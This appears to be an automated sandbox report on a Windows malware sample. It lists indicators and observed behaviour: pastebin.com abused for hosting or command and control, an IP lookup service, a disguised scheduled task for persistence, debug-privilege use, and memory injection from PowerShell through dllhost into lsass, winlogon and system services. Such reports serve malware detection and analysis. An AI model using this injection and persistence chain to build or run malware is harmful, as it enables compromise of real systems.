Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\$77e1f23e	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\$77f99bf3	N/A

Legitimate hosting services abused for malware hosting/C2

Description	Indicator	Process	Target
N/A	pastebin.com	N/A	N/A

Looks up external IP address via web service

Description	Indicator	Process	Target
N/A	ip-api.com	N/A	N/A

Drops file in System32 directory

Description	Indicator	Process	Target
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	C:\Windows\System32\svchost.exe	N/A
File opened for modification	C:\Windows\System32\Tasks\$77Docker Desktop Installer.exe	C:\Windows\system32\svchost.exe	N/A
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	C:\Windows\System32\svchost.exe	N/A

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 4792 set thread context of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 2916 set thread context of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 4792 set thread context of 5072	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77f99bf3

Enumerates physical storage devices

Enumerates system info in registry

Description	Indicator	Process	Target
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	C:\Windows\system32\wbem\wmiprvse.exe	N/A

Modifies data under HKEY_USERS

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A
N/A	N/A	C:\Windows\System32\dllhost.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\dllhost.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\$77f99bf3	N/A
Token: SeAssignPrimaryTokenPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeAssignPrimaryTokenPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeAssignPrimaryTokenPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeAssignPrimaryTokenPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeAssignPrimaryTokenPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\system32\svchost.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 4792 wrote to memory of 2752	N/A	C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe	C:\Users\Admin\AppData\Local\Temp\$77e1f23e
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 2916 wrote to memory of 4020	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE	C:\Windows\System32\dllhost.exe
PID 4020 wrote to memory of 636	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\winlogon.exe
PID 4020 wrote to memory of 692	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\lsass.exe
PID 4020 wrote to memory of 1000	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 484	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\dwm.exe
PID 4020 wrote to memory of 540	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 756	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1052	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1060	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1176	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1196	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1264	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1272	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1376	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1384	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1436	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1548	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1564	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1672	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1684	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1744	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1820	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1876	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1964	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1972	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 1728	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 1788	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2088	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\spoolsv.exe
PID 4020 wrote to memory of 2232	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 2408	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2420	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 2432	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2464	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2544	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\sysmon.exe
PID 4020 wrote to memory of 2564	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2580	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\svchost.exe
PID 4020 wrote to memory of 2600	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2608	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 2780	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\sihost.exe
PID 4020 wrote to memory of 1044	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 792	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\wbem\unsecapp.exe
PID 4020 wrote to memory of 3316	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\Explorer.EXE
PID 4020 wrote to memory of 3444	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 3476	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe
PID 4020 wrote to memory of 3824	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\RuntimeBroker.exe
PID 4020 wrote to memory of 3952	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\System32\RuntimeBroker.exe
PID 4020 wrote to memory of 3976	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\DllHost.exe
PID 4020 wrote to memory of 4024	N/A	C:\Windows\System32\dllhost.exe	C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

